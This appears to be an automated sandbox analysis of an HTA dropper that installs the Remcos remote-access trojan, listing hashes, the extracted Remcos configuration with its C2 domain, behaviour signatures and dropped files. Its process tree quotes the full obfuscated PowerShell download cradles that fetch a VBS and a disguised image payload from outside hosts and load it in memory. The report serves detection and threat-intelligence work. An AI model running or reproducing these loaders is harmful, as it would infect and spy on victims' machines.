Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 06:37

General

  • Target

    greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta

  • Size

    80KB

  • MD5

    fccab384cf7d38618313385c0e22638b

  • SHA1

    6e0efbb76a4d4b39a82b7d84393f399ea431b07e

  • SHA256

    fc357d0488d2be1a5a49893d842e24d303250346dad592f6b1c8a9511edc15d2

  • SHA512

    72c9ba041cbeba138a2e02ac8ccb726c58abaa834386a09c203b9e9f9759e0f4c6e5f2ab3c29ab05f93e573195adb8e43a8a89811505084851eff6748f28a4af

  • SSDEEP

    768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAgxLiFZpd0LTna8/GdHz6kXd0LcRPi+Bkqr93:tL

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

C2

submarrine.duckdns.org:6946

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GH3PRL

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1212
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3368
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5okmduqr\5okmduqr.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9CD.tmp" "c:\Users\Admin\AppData\Local\Temp\5okmduqr\CSCBA5E3116C9414D0AB1CF9DD695235D5.TMP"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:5024
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3492
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4252
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:2116

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    102B

    MD5

    a84d7b47077eb7a5acda155e7be0bb76

    SHA1

    96232aa2d1cad9ae355491edfb1bc8e6539c0ef3

    SHA256

    6e2f4eb3190d2b488fee13c00e19badcbd09e31db75e474b83aa6bd088c2a497

    SHA512

    9d1c40f4931705cfbed572882f0b352d9023006153dbc548a5bb1244221149faeb6806fdb98196f60564218250e12a645584ecd2cf7847b455417ca5fabe159e

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    19KB

    MD5

    e09c7cb98cce8800a17b0bd5349b024b

    SHA1

    ec842fec02859ddb365ae5b4200e2f5aba1e1cfd

    SHA256

    19d03676253bfb77b0365f7855943b2a9634089068ffc6ee547da79bd52afa8a

    SHA512

    01101abb77f299726b282f9f4ad72ffc70b299f4d48739f9cce0a41d45ad51dfc0f3422ef93a52439e8f0bda945b7b3300c91e6ed454467959a1c327b7aed90e

  • C:\Users\Admin\AppData\Local\Temp\5okmduqr\5okmduqr.dll

    Filesize

    3KB

    MD5

    bd118aa389e00e6c7969ee7bc9988d17

    SHA1

    f276e2fddc99bdf7af1b4201c46e65434e924a65

    SHA256

    e110f9a24c219c9537f432e6521356d4603f2644c272f9d1fa3abf0bb5cba268

    SHA512

    264aea778a85867208b619dc9c0de98fe1fb0dbd042e182b106d1a7d682003e52083f10f01f28adb081f996a324436f5badf44a7314513a8c31075a6725a6597

  • C:\Users\Admin\AppData\Local\Temp\RESA9CD.tmp

    Filesize

    1KB

    MD5

    81b237f2bba4aa3f3f47f0ea232da6b2

    SHA1

    8c1cb448e8b1fc35006a78250037dd729671c6db

    SHA256

    9c31f06c34cc32410b722fdf645695ff12c60876895cbce2f2ffb4a9ddcb008c

    SHA512

    0cc6fe2ed140270696cdb95688ffced250395b42d6a89cd9c653663fe7873a15cb2e4ad5147ad5da5e5d05e28969e992a5d70f64a97da5abdba1b4465f4912e1

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sxkq4na1.ucb.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS

    Filesize

    150KB

    MD5

    61bcbe69140cdee35ac40f1d97773746

    SHA1

    bb5d746eca7a18890b642e6952eb9c5f71dedaaa

    SHA256

    d68723edcf3ff4f0c7ded177c7eebd74df498b8d16b111fac54f1c11e37c93cf

    SHA512

    303ee3b3b8620f536c3e298bd65557badf251870ca46656741c8d787a351f3abca94fe39bb701563aef9c7c85f89bbdb447704e1f5bce1b63701f575db5e4b0b

  • \??\c:\Users\Admin\AppData\Local\Temp\5okmduqr\5okmduqr.0.cs

    Filesize

    483B

    MD5

    567f2c2af7886bd10a602edea0dbb33b

    SHA1

    aaa2f286d79889f3ae9cd98b9b728f832a0981bd

    SHA256

    942b49df85678ada85046144cac22ee63e865763ea87b1ab1aa56e86e8fe2dac

    SHA512

    8ce20e4dff36398aa1b520c2959907662216003c20085cc6ecf1e612e4005683b187afbe423c3d7a3bdb7da16995526894f264ec4094d3741573eebc7fc35c4c

  • \??\c:\Users\Admin\AppData\Local\Temp\5okmduqr\5okmduqr.cmdline

    Filesize

    369B

    MD5

    71a28084cd2198fc25fa963dd4b21890

    SHA1

    5369adde43f5515fc57e8c61d708d2f38e00c3fe

    SHA256

    7fd66d243298e3fad27a4f25846d060e692f7342fb45f24eeb1d6064132ceda1

    SHA512

    2886e67016fa6248721c35558e6b2105f5a54ddbb8b8a3f3a152cdc723f9cb84a92422d6e929b518b1cdc0dd0df6bbafd33cc9a40497258c147c6da57b2850a1

  • \??\c:\Users\Admin\AppData\Local\Temp\5okmduqr\CSCBA5E3116C9414D0AB1CF9DD695235D5.TMP

    Filesize

    652B

    MD5

    2b5363bdb864baa77265c306220ab177

    SHA1

    f2f52b5acee1f4a2cbf80f17bf333b5d5f3916ba

    SHA256

    623eca2ee49cddbc913a39e395e2b9fb96df7eb5255ff8727c85e2187cb22f28

    SHA512

    91cc7f0a2fb75fea27f74c0b23ab6c708e5a1b46d88d76ae7feb22307b90cccb582cd308e8f73c3f5028cee3ad5f971b210236233406ac1264fb8cc5fff4d631

  • memory/2116-91-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-87-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-127-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-128-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-119-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-120-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-111-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-112-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-103-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-104-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-97-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-95-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-93-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-94-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-85-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-92-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2116-86-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2524-40-0x00000000077F0000-0x0000000007886000-memory.dmp

    Filesize

    600KB

  • memory/2524-44-0x00000000077D0000-0x00000000077EA000-memory.dmp

    Filesize

    104KB

  • memory/2524-18-0x0000000006200000-0x000000000621E000-memory.dmp

    Filesize

    120KB

  • memory/2524-17-0x0000000005CF0000-0x0000000006044000-memory.dmp

    Filesize

    3.3MB

  • memory/2524-6-0x0000000005B10000-0x0000000005B76000-memory.dmp

    Filesize

    408KB

  • memory/2524-58-0x00000000077C0000-0x00000000077C8000-memory.dmp

    Filesize

    32KB

  • memory/2524-7-0x0000000005B80000-0x0000000005BE6000-memory.dmp

    Filesize

    408KB

  • memory/2524-5-0x0000000005240000-0x0000000005262000-memory.dmp

    Filesize

    136KB

  • memory/2524-64-0x000000007133E000-0x000000007133F000-memory.dmp

    Filesize

    4KB

  • memory/2524-65-0x0000000071330000-0x0000000071AE0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-2-0x0000000071330000-0x0000000071AE0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-4-0x0000000071330000-0x0000000071AE0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-70-0x0000000071330000-0x0000000071AE0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-33-0x0000000006800000-0x000000000681E000-memory.dmp

    Filesize

    120KB

  • memory/2524-3-0x00000000052F0000-0x0000000005918000-memory.dmp

    Filesize

    6.2MB

  • memory/2524-35-0x0000000071330000-0x0000000071AE0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-36-0x0000000071330000-0x0000000071AE0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-45-0x00000000077C0000-0x00000000077C8000-memory.dmp

    Filesize

    32KB

  • memory/2524-0-0x000000007133E000-0x000000007133F000-memory.dmp

    Filesize

    4KB

  • memory/2524-43-0x0000000007790000-0x00000000077A4000-memory.dmp

    Filesize

    80KB

  • memory/2524-42-0x0000000007780000-0x000000000778E000-memory.dmp

    Filesize

    56KB

  • memory/2524-41-0x0000000007750000-0x0000000007761000-memory.dmp

    Filesize

    68KB

  • memory/2524-19-0x0000000006250000-0x000000000629C000-memory.dmp

    Filesize

    304KB

  • memory/2524-39-0x00000000075D0000-0x00000000075DA000-memory.dmp

    Filesize

    40KB

  • memory/2524-20-0x00000000071D0000-0x0000000007202000-memory.dmp

    Filesize

    200KB

  • memory/2524-21-0x0000000071330000-0x0000000071AE0000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-1-0x0000000004C30000-0x0000000004C66000-memory.dmp

    Filesize

    216KB

  • memory/2524-22-0x000000006DBF0000-0x000000006DC3C000-memory.dmp

    Filesize

    304KB

  • memory/2524-38-0x0000000007570000-0x000000000758A000-memory.dmp

    Filesize

    104KB

  • memory/2524-37-0x0000000007BF0000-0x000000000826A000-memory.dmp

    Filesize

    6.5MB

  • memory/2524-23-0x000000006DD60000-0x000000006E0B4000-memory.dmp

    Filesize

    3.3MB

  • memory/2524-34-0x00000000074C0000-0x0000000007563000-memory.dmp

    Filesize

    652KB

  • memory/4252-84-0x0000000017190000-0x000000001722C000-memory.dmp

    Filesize

    624KB

  • memory/4252-83-0x0000000007910000-0x0000000007A68000-memory.dmp

    Filesize

    1.3MB

  • memory/4252-81-0x0000000005D60000-0x00000000060B4000-memory.dmp

    Filesize

    3.3MB